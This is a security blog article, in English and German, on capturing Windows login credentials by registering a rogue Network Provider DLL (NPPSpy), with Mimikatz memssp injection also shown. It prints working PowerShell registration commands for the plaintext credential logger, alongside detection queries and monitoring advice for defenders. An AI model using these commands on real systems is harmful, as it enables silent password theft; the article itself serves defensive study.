Network Provider - Sneaky alternative to extract credentials

Network Provider

Sneaky alternative to extract credentials

Michael Schneider
by Michael Schneider
on February 17, 2022
time to read: 8 minutes

Keypoints

Windows attacks with Network Provider

  • Attacks against LSA can be made harder with Credential Guard and LSA Protection
  • Security Support Providers get access to credentials via LSA
  • Network Providers also get credentials access on logins and password changes
  • NPPSpy is a Network Provider/Credential Manager DLL that extracts credentials and stores them in plain text
  • Network Providers are an alternative to LSA attacks that is less observed and easier to execute

The security functions Additional LSA Protection and Credential Guard make it more difficult to extract credentials from memory. The passwords of domain users, for example, are encrypted with Credential Guard and there is no known direct attack against the virutalisation of the Local Security Authority Subsystem Service (LSASS) process. Only Microsoft-signed security modules are allowed to be loaded into the LSASS process with LSA Protection.

However, techniques exist to circumvent both security features. By manipulating the core system, Virtual Secure Mode (VSM) and thus Credential Guard can be disabled, and by loading signed kernel driver, LSA Protection can be deactivated in real time. These techniques harm the integrity of the system and leave obvious traces that can be detected. Are there other techniques to get credentials that have lower requirements and less impact on a systems integrity?

Windows Authentication Provider

User authentication is a core function of the operating system. The Windows Authentication Architecture contains multiple components that have access to credentials. When users authenticate themselves to the operating system, these components can further process the credentials. An often-used procedure is the caching of credentials in order to authenticate against other systems without users having to enter their usernames and passwords again.

Security Support Provider

The Security Support Providers (SSP) include Kerberos, NTLM (MSV1), TLS/SSL (Schannel) and Digest (WDigest). The Security Support Provider Interface (SSPI) provides support to easily load additional security modules. The registry key Security Packages must be extended by the name of the SSPs DLL for this purpose. The key is located under the path HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages.

The LSA Protection function can be used to restrict that only SSPs signed by Microsoft are allowed to be loaded – otherwise any DLL can be loaded into the LSASS process. For example, Mimikatz has with mimilib.dll an SSP that can be loaded with administrative rights:

mimikatz(commandline)# privilege::debug
Privilege '20' OK

mimikatz(commandline)# misc::memssp
Injected =)

Alternatively, the file mimilib.dll can be copied into the directory %WINDIR%\system32 and the Security Packages registry key must be expanded – if Mimikatz should not be executed on the target system. After the Mimikatz SSP has been loaded, credentials are written to mimilsa.log after a successful login.

Attacks against LSA and the use of SSPs have been practised for years, so most of the techniques are known, countermeasures are available, and various endpoint systems can detect the attack techniques.

Network Provider

A network provider is a DLL that provides support for specific network protocols. They use the Network Provider API to communicate with the operating system. A network provider can also be a credential manager. They receive a notification when a user logs in, or a password is changed.

Winlogon provides the graphical interface (GUI) and authentication functionality. Winlogon communicates with mpnotify via an RPC channel and communicates usernames and passwords. The mpnotify tool then distributes this information to the registered credential managers. These can be loaded via the registry in the same way as SSPs. The registry key ProviderOrder under the path HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order contains all network provider. The function NPLogonNotify is used to receive credentials as a credential manager.

NPPSpy

The security researcher Grzegorz Tworek had written an implementation of the NPLogonNotify function with NPPSpy two years ago in July 2020. NPPSpy stores the username and password of a login in plain text in a log file.

Use

The NPPSpy DLL is copied into the folder %WINDIR%\system32 with administrative rights. Afterwards, some registry keys must be set and NPPSpy must be registered as a network provider. This can be done with the following PowerShell commands:

$NetworkProviderName = "NPPSpy"

New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName"
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider"
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Class" -Value 2
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Name" -Value $NetworkProviderName
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\$NetworkProviderName.dll"

$NetworkProviderPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name ProviderOrder
$NetworkProviderOrder = $NetworkProviderPath.ProviderOrder + ",$NetworkProviderName"
Set-ItemProperty -Path $NetworkProviderPath.PSPath -Name ProviderOrder -Value $NetworkProviderOrder

After that, NPPSpy is active and saves the credentials in the file C:\NPPSpy.txt every time someone logs in.

Countermeasures

The attack requires administrative rights because a DLL file is copied into the Windows system directory and registry entries are created/adjusted. If attacker obtain administrative rights, the attack cannot be prevented directly. Unlike the LSASS process, there are no hardening measures for network providers. The NPPSpy DLL may be detected by an endpoint solution.

To detect the attack, the registry key HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder should be monitored for changes. Furthermore, Services that are registered as Network Providers can be monitored. The query suggested in the article Network Logon Provider Registry Modification can be used for Elasticsearch, for example:

registry where registry.data.strings != null and registry.path : "HKL
M\\SYSTEM\\*ControlSet*\\Services\\*\\NetworkProvider\\ProviderPath"
and /* Excluding default NetworkProviders RDPNP, LanmanWorkstation
and webclient. */ not ( user.id : "S-1-5-18" and
registry.data.strings in
("%SystemRoot%\\System32\\ntlanman.dll",
"%SystemRoot%\\System32\\drprov.dll",
"%SystemRoot%\\System32\\davclnt.dll") )

In Grzegorz Tworek’s repository there is also the PowerShell script Get-NetworkProviders.ps1, which lists all registered network providers of a system. This is used to analyse the network providers and lists additional information about the respective DLL file, whether it was signed and by whom.

PS C:\> .\Get-NetworkProviders.ps1

Name        : RDPNP
DllPath     : C:\Windows\System32\drprov.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.1 (WinBuild.160101.0800)
Description : Microsoft Remote Desktop Session Host Server Network Provider

Name        : LanmanWorkstation
DllPath     : C:\Windows\System32\ntlanman.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.1 (WinBuild.160101.0800)
Description : Microsoft® Lan Manager

Name        : webclient
DllPath     : C:\Windows\System32\davclnt.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.546 (WinBuild.160101.0800)
Description : Web DAV Client DLL

Name        : NPPSpy
DllPath     : C:\Windows\System32\NPPSPY.dll
Signer      :
Version     :
Description :

The network provider NPPSpy is suspicious in this case. Attackers can, of course, choose any name, but the missing signature is a suspect indicator.

Conclusion

Attacks against LSAs are widespread and consequently some hardening measures exist to make such attacks more difficult. The complexity and requirements for LSA attacks are constantly increasing. In addition, the extraction of LSA memory is detected and partially blocked by many endpoint solutions. In contrast, attacks using network providers are easy to implement and are much less monitored. Accordingly, defenders should implement suitable detection use cases for network providers. For attackers, network provider are an alternative to still extract credentials. In contrast to an LSA dump, however, attackers do not directly obtain credentials, but must access the log file again at a later time and hope that someone has logged into the system.

About the Author

Michael Schneider

Michael Schneider has been in IT since 2000. Since 2010 he is focused on information security. He is an expert at penetration testing, hardening and the detection of vulnerabilities in operating systems. He is well-known for a variety of tools written in PowerShell to find, exploit, and mitigate weaknesses. (ORCID 0000-0003-0772-9761)

Links

Are you interested in a Penetration Test?

Our experts will get in contact with you!

×
Forced Authentication

Forced Authentication

Michael Schneider

Attacks via Peripheral Devices

Attacks via Peripheral Devices

Michael Schneider

Farewell NTLM

Farewell NTLM

Michael Schneider

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here

Network Provider - Alternativ Anmeldedaten unauffällig auslesen

Network Provider

Alternativ Anmeldedaten unauffällig auslesen

Michael Schneider
von Michael Schneider
am 17. Februar 2022
Lesezeit: 8 Minuten

Keypoints

Windows-Angriffe über Network Provider

  • Angriffe gegen LSA können mit Credential Guard und LSA Protection erschwert werden
  • Sicherheitsmodule (SSP) erhalten Zugriff auf Anmeldedaten über LSA
  • Network Provider erhalten jedoch auch Anmeldedaten bei Login und Passwortwechsel
  • NPPSpy ist eine Network Provider/Credential Manager DLL, die Anmeldedaten ausliest und im Klartext speichert
  • Network Provider sind eine Alternative zu LSA-Angriffen, die weniger beachtet ist und einfacher umzusetzen ist

Durch die Verwendung der Sicherheitsfunktionen Additional LSA Protection und Credential Guard wird das Auslesen von Anmeldedaten aus dem Speicher erschwert. Mit Credential Guard werden unter anderem die Passwörter von Domänenbenutzern verschlüsselt und es ist kein direkter Angriff gegen die Virutalisierung des Prozesses Local Security Authority Subsystem Service (LSASS) bekannt. Mit LSA Protection dürfen nur von Microsoft signierte Sicherheitsmodule in den LSASS-Prozess geladen werden.

Es existieren jedoch Techniken um beide Sicherheitsfunktionen zu umgehen. Durch Manipulationen am System kann der Virtual Secure Mode (VSM) und somit Credential Guard deaktiviert werden und durch das Laden von signierten Kernel-Treiber kann LSA Protection zur Laufzeit ausgeschalten werden. Diese Techniken beschädigen die Integrität des Systems und hinterlassen sichtbare Spuren, die detektiert werden können. Gibt es weitere Techniken um an Anmeldedaten zu gelangen, die tiefere Anforderungen und weniger einschneidende Effekte auf die Integrität des Systems haben?

Windows Authentication Provider

Die Authentisierung von Benutzern ist eine zentrale Funktion des Betriebssystems. Die Windows Architektur zur Authentisierung beinhaltet verschiedene Komponenten, die Zugriff auf Anmeldedaten haben. Wenn Benutzer sich gegenüber dem Betriebssystem authentisieren, können diese Komponenten die Anmeldedaten weiter verarbeiten. Ein oft genutzter Vorgang ist das Zwischenspeichern der Anmeldedaten, um sich gegenüber weiteren Systemen authentisieren zu können, ohne dass Benutzer nochmals ihre Benutzernamen und Passwörter eingeben müssen.

Security Support Provider

Zu den Security Support Provider (SSP) gehören unter anderem Kerberos, NTLM (MSV1), TLS/SSL (Schannel) und Digest (WDigest). Das Security Support Provider Interface (SSPI) ermöglicht es, dass weitere Sicherheitsmodule einfach geladen werden können. Dazu muss der Registryschlüssel Security Packages um den Namen der DLL des SSPs erweitert werden. Der Schlüssel befindet sich unter dem Pfad HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages.

Durch die Funktion LSA Protection kann eingeschränkt werden, dass nur durch Microsoft signierte SSPs geladen werden dürfen – ansonsten kann jede beliebige DLL in den LSASS-Prozess geladen werden. Beispielsweise verfügt Mimikatz mit mimilib.dll über ein SSP, der mit administrativen Rechten geladen werden kann:

mimikatz(commandline)# privilege::debug
Privilege '20' OK

mimikatz(commandline)# misc::memssp
Injected =)

Alternativ kann die Datei mimilib.dll in das Verzeichnis %WINDIR%\system32 kopiert und der Security Packages Registryschlüssel erweitert werden – falls Mimikatz auf dem Zielsystem nicht ausgeführt werden soll. Nachdem der Mimikatz SSP geladen wurde, werden die Anmeldedaten nach einer erfolgten Anmeldung in die Datei mimilsa.log geschrieben.

Angriffe gegen LSA und die Verwendung von SSPs werden seit Jahren praktiziert, daher sind die meisten Techniken dazu bekannt, Gegenmassnahmen stehen zur Verfügung und verschiedene Endpoint-Systeme können die Angriffe detektieren.

Network Provider

Ein Network Provider ist eine DLL, die Unterstützung für spezifische Netzwerkprotokolle bieten. Diese verwenden die Network Provider API um mit dem Betriebssystem zu kommunizieren. Ein Network Provider kann zugleich auch ein Credential Manager sein. Diese erhalten eine Notifikation, wenn ein Benutzer sich anmeldet oder ein Passwort geändert wird.

Winlogon stellt das graphische Interface (GUI) und die Funktionalität zur Authentisierung zur Verfügung. Über einen RPC-Kanal kommuniziert Winlogon mit mpnotify und teilt Benutzernamen und Passwörter mit. Das Programm mpnotify verteilt diese Information dann an die registrierten Credential Manager. Diese können analog zu SSPs über die Registry geladen werden. Der Registryschlüssel ProviderOrder unter dem Pfad HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order enthält alle Network Provider. Um als Network Provider respektive Credential Manager die Anmeldedaten zu erhalten, wird die Funktion NPLogonNotify eingesetzt.

NPPSpy

Der Security Researcher Grzegorz Tworek hatte vor zwei Jahren im Juli 2020 mit NPPSpy eine Implementierung der Funktion NPLogonNotify geschrieben. NPPSpy speichert Benutzername und Passwort eines Logins im Klartext in einer Logdatei.

Anwendung

Die NPPSpy DLL wird mit administrativen Rechten in das Verzeichnis %WINDIR%\system32 kopiert. Danach müssen einige Registryschlüssel gesetzt werden und NPPSpy als Network Provider registriert werden. Dies kann mit den folgenden PowerShell-Befehlen gemacht werden:

$NetworkProviderName = "NPPSpy"

New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName"
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider"
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Class" -Value 2
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "Name" -Value $NetworkProviderName
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$NetworkProviderName\NetworkProvider" -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\$NetworkProviderName.dll"

$NetworkProviderPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name ProviderOrder
$NetworkProviderOrder = $NetworkProviderPath.ProviderOrder + ",$NetworkProviderName"
Set-ItemProperty -Path $NetworkProviderPath.PSPath -Name ProviderOrder -Value $NetworkProviderOrder

Danach ist NPPSpy aktiv und speichert bei jedem Login die Anmeldedaten in der Datei C:\NPPSpy.txt.

Gegenmassnahmen

Der Angriff erfordert administrative Rechte, da eine DLL-Datei in das Windows-Systemverzeichnis kopiert wird und Registry-Einträge erstellt/angepasst werden. Wenn Angreifer an administrative Rechte gelangen, kann der Angriff nicht direkt verhindert werden. Im Gegensatz zum LSASS-Prozess gibt es keine Härtungsmassnahmen für Network Provider. Gegebenenfalls wird die NPPSpy DLL von einer Endpoint-Lösung erkannt.

Um den Angriff zu erkennen, sollte der Registryschlüssel HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder auf Änderungen überwacht werden. Zudem können Services überwacht werden, die als Network Provider registriert werden. Für Elasticsearch beispielsweise kann die im Artikel Network Logon Provider Registry Modification vorgeschlagene Abfrage verwendet werden:

registry where registry.data.strings != null and registry.path : "HKL
M\\SYSTEM\\*ControlSet*\\Services\\*\\NetworkProvider\\ProviderPath"
and /* Excluding default NetworkProviders RDPNP, LanmanWorkstation
and webclient. */ not ( user.id : "S-1-5-18" and
registry.data.strings in
("%SystemRoot%\\System32\\ntlanman.dll",
"%SystemRoot%\\System32\\drprov.dll",
"%SystemRoot%\\System32\\davclnt.dll") )

Im Repository von Grzegorz Tworek gibt es zusätzlich das PowerShell-Skript Get-NetworkProviders.ps1, welches alle registrierten Network Provider eines Systems ausliest. Dies dient zur Analyse der Network Provider und listet zusätzliche Informationen zur jeweiligen DLL-Datei, ob und durch wen diese signiert wurde.

PS C:\> .\Get-NetworkProviders.ps1

Name        : RDPNP
DllPath     : C:\Windows\System32\drprov.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.1 (WinBuild.160101.0800)
Description : Microsoft Remote Desktop Session Host Server Network Provider

Name        : LanmanWorkstation
DllPath     : C:\Windows\System32\ntlanman.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.1 (WinBuild.160101.0800)
Description : Microsoft® Lan Manager

Name        : webclient
DllPath     : C:\Windows\System32\davclnt.dll
Signer      : CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version     : 10.0.19041.546 (WinBuild.160101.0800)
Description : Web DAV Client DLL

Name        : NPPSpy
DllPath     : C:\Windows\System32\NPPSPY.dll
Signer      :
Version     :
Description :

Der Network Provider NPPSpy ist in diesem Fall auffällig. Angreifer können natürlich beliebige Namen wählen, aber die fehlende Signatur ist ein verdächtiges Indiz.

Fazit

Angriffe gegen LSA sind weit verbreitet und dementsprechend existieren einige Härtungsmassnahmen, um solche Angriffe zu erschweren. Die Komplexität und Anforderungen für LSA-Angriffe steigt daher stetig an. Zudem wird das Auslesen des LSA-Speichers durch viele Endpoint-Lösungen erkannt und teilweise blockiert. Im Gegenzug dazu sind Angriffe mittels Network Provider einfach zu implementieren und werden weitaus weniger überwacht. Verteidiger sollten dementsprechend passende Detection Use Cases für Network Provider implementieren. Für Angreifer stellen Network Provider eine Alternative dar, um weiterhin Anmeldedaten auslesen zu können. Im Gegensatz zu einem LSA-Dump erlangen Angreifer jedoch nicht direkt Anmeldedaten, sondern müssen zu einem späteren Zeitpunkt wieder an die Logdatei gelangen und darauf hoffen, dass sich jemand am System angemeldet hat.

Über den Autor

Michael Schneider

Michael Schneider arbeitet seit dem Jahr 2000 in der IT. Im Jahr 2010 hat er sich auf die Informationssicherheit spezialisiert. Zu seinen Aufgaben gehören das Penetration Testing, Hardening und das Aufspüren von Schwachstellen in Betriebssystemen. Er ist bekannt für eine Vielzahl in PowerShell geschriebener Tools zum Finden, Ausnutzen und Beheben von Schwachstellen. (ORCID 0000-0003-0772-9761)

Links

Haben Sie Interesse an einem Penetration Test?

Unsere Spezialisten kontaktieren Sie gern!

×
Forced Authentication

Forced Authentication

Michael Schneider

Angriffe über Peripheriegeräte

Angriffe über Peripheriegeräte

Michael Schneider

Lebewohl NTLM

Lebewohl NTLM

Michael Schneider

ContainerKitty

ContainerKitty

Michael Schneider

Sie wollen mehr?

Weitere Artikel im Archiv

Sie brauchen Unterstützung bei einem solchen Projekt?

Unsere Spezialisten kontaktieren Sie gern!

Sie wollen mehr?

Weitere Artikel im Archiv